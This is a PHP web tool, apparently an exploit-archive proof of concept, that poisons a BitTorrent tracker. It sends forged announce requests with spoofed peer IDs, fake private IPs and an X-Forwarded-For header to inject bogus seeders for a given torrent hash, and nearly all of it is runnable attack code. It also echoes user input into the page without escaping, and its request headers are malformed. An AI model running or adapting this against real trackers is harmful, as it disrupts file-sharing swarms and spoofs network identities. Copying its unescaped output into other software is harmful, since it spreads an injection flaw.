BTpoison.php

1. <!--
2. This script is creating a random peer on a tracker for a specific torrent, based on the announce URL and the torrent's hash.
3. It is mostly inspired by the C# script from Burningmace : http://packetstormsecurity.org/0911-exploits/torrent-poisoning.txt
4. Currently, only ONE request is sent to the tracker and only private IPs are used. It is enough for the proof of concept.
5. Use it wisely, youg padawan.
6. -->
7. <HTML>
8. <HEAD>
9. <TITLE>BTpoison.php</TITLE>
10. <STYLE TYPE="text/css">
11. <!--
12. BODY, TD, TH {
13.         font-family: Verdana;
14.         font-size: 11px;
15.         color: #867C68;
16. }
17. A {
18.         text-decoration: none;
19. }
20. A:HOVER {
21.         color: #FF0000;
22.         text-decoration: underline;
23. }
24. #warning {
25.     background-color: #CC0000;
26.         color: #FFFFFF;
27.     padding: 5px;
28.     margin: 20px 0px 20px 0px;
29.     width: 600px;
30. }
31. #log {
32.     background-color: #000000;
33.         color: #FFFFFF;
34.     padding: 5px;
35.     margin: 20px 0px 20px 0px;
36.     width: 600px;
37. }
38. PRE {
39.         color: yellow;
40.     white-space: pre-wrap;       /* CSS-3                  */
41.     white-space: -moz-pre-wrap;  /* Mozilla, since 1999    */
42.     white-space: -pre-wrap;      /* Opera 4-6              */
43.     white-space: -o-pre-wrap;    /* Opera 7                */
44.     word-wrap: break-word;       /* Internet Explorer 5.5+ */
45. }
46. -->
47. </STYLE>
48. </HEAD>
49. <BODY TEXT="#867C68" LINK="#800000" ALINK="#800000" VLINK="#800000">
50.  
51. <h3>BTpoison.php</h3><h5>version : 0.070</h5>
52.  
53. <?php
54.  
55. $run = $_GET['run'];
56. $announceurl = $_GET['announceurl'];
57. $hash = $_GET['hash'];
58.  
59. //if (isset($run) && $run == 'Run') {
60. if (isset($announceurl) && isset($hash)) {
61. if ($announceurl == '' || $hash == '') { echo "<div id=\"warning\">You MUST feed me with both URL and hash !</div>"; } else {  
62.  
63. // ============================ START ============================
64.  
65. echo "<div id=\"log\">";
66.  
67. // gathering stuff
68. $parsedurl = parse_url($announceurl);
69. $host = $parsedurl[host] ;
70. if (isset($parsedurl[port])) { $hostport = $parsedurl[port] ; } else { $hostport = 80 ; }
71. $hostpath = $parsedurl[path] ;
72. $tmphash = str_split($hash, 2);
73. $encodedhash = '%'.implode("%", $tmphash); ;
74. $clientid = '-UT1800-'.rand(10,99).rand(10000,99999).rand(10000,99999) ; // UT, AZ, TR...
75. $left = 0 ; // bytes left (0 to seed)
76. $event = "completed" ; // or started
77. $port = rand(42000,42999) ;
78. $nfetch = 5 ; // numwant
79. $ipaddress = '192.168.'.rand(0,255).'.'.rand(0,255) ;
80. $uagent = "uTorrent/1800(18488)" ;
81.  
82. echo "announce URL : $announceurl<br>" ;
83. echo "host : $host<br><br>" ;
84. echo "hash : $hash<br>" ;
85. echo "encodedhash : $encodedhash<br><br>" ;
86. echo "random peer id : $clientid<br>" ;
87. echo "random peer ip : $ipaddress<br><br>" ;
88.  
89. $request = $announceurl.'?info_hash='.$encodedhash.'&peer_id='.$clientid.'&uploaded=0&downloaded=0&left='.$left.'&event='.$event.'&port='.$port.'&numwant='.$nfetch.'&ip='.$ipaddress.'&compact=1' ;
90.  
91. echo "BT request : ".$request."<br><br>--------------------<br><br>" ;
92.  
93. // cooking request
94. $envoi = "GET $request HTTP/1.0\r\n\r\n";
95. $envoi .= "Host: $host\r\n";
96. $envoi .= "X-Forwarded-For: $ipaddress\r\n";
97. $envoi .= "User-Agent: $uagent\r\n";
98. $envoi .= "Content-type: text/html\r\n";
99. $envoi .= "Connection: Close\r\n\r\n";
100.  
101. $longueur = strlen($envoi) ;
102. echo "HTTP request : <pre>$envoi</pre>";
103. echo "request lenth : $longueur<br><br>--------------------<br><br>";
104.  
105. // sending request
106. $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
107. if($socket < 0){ die('FATAL ERROR: socket_create() : " '.socket_strerror($socket).' "'); }
108.     else { echo "creating socket...<br>"; }
109. if (socket_connect($socket,gethostbyname($host),$hostport) < 0){ die('FATAL ERROR: socket_connect()'); }
110.     else { echo "connecting socket...<br>"; }
111. if(($int = socket_write($socket, $envoi, strlen($envoi))) === false){ die('FATAL ERROR: socket_write() failed, '.$int.' characters written'); }
112.     else { echo "sending HTTP request...<br><br>"; }
113.  
114. // reading answer
115. $reception = '';
116. while($buff = socket_read($socket, 3000)){ $reception.=$buff; }
117. echo 'server says : <pre>'.$reception."</pre>--------------------<br>";
118.  
119. socket_close($socket);
120.  
121. echo "</div>"; //log
122.  
123. // ============================ END ============================
124.  
125.     } // else
126. } // if isset
127.  
128. ?>
129.  
130. <form method="get" action="btpoison.php" enctype="multipart/form-data">
131. <fieldset style="width: 600px;">
132. <legend>torrent data</legend>
133. <p><label for="announceurl">announce URL : </label><input type="text" name="announceurl" /><small> &raquo; http://tracker.domaine.ext/announce.php</small></p>
134. <p><label for="hash">hash : </label><input type="text" name="hash" /><small> &raquo; 43c10318709c06f7ef7d6b4d26673378103203a3</small></p>
135. <p><input type="submit" name="run" value="Run" /></p>
136.  
137. </fieldset>
138. </form>
139.  
140. </BODY>
141. </HTML>